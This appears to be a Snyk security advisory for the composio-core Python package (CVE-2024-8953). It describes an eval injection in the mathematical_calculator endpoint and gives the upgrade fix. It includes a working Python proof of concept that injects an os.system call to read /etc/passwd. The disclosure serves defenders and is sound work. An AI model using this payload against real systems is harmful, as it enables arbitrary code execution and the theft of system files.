Homepage

Dynamic Variable Evaluation Affecting composio-core package, versions [,0.5.43)

Severity

 Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.1% (29th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-COMPOSIOCORE-9637814
  • published3 Apr 2025
  • disclosed20 Mar 2025
  • creditAditya Singh
Report a new vulnerability Found a mistake?

Introduced: 20 Mar 2025

CVE-2024-8953  (opens in a new tab)
CWE-627  (opens in a new tab)

How to fix?

Upgrade composio-core to version 0.5.43 or higher.

Overview

composio-core is a Core package to act as a bridge between composio platform and other services.

Affected versions of this package are vulnerable to Dynamic Variable Evaluation through the eval function in the mathematical_calculator endpoint. An attacker can execute arbitrary code by injecting malicious input into the function.

PoC

import requests

url = "http://localhost:8000/api/actions/execute/mathematical_calculator"
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
    "Cookie": "ajs_anonymous_id=736dccdf-3165-49e6-8800-33d3a0699422",
    "Content-Type": "application/json"
}

data = {
    "params": {
        "operation": "__import__('os').system('cat /etc/passwd > /tmp/testing.txt')"
    }
}

response = requests.post(url, json=data, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")

CVSS Base Scores

version 4.0
version 3.1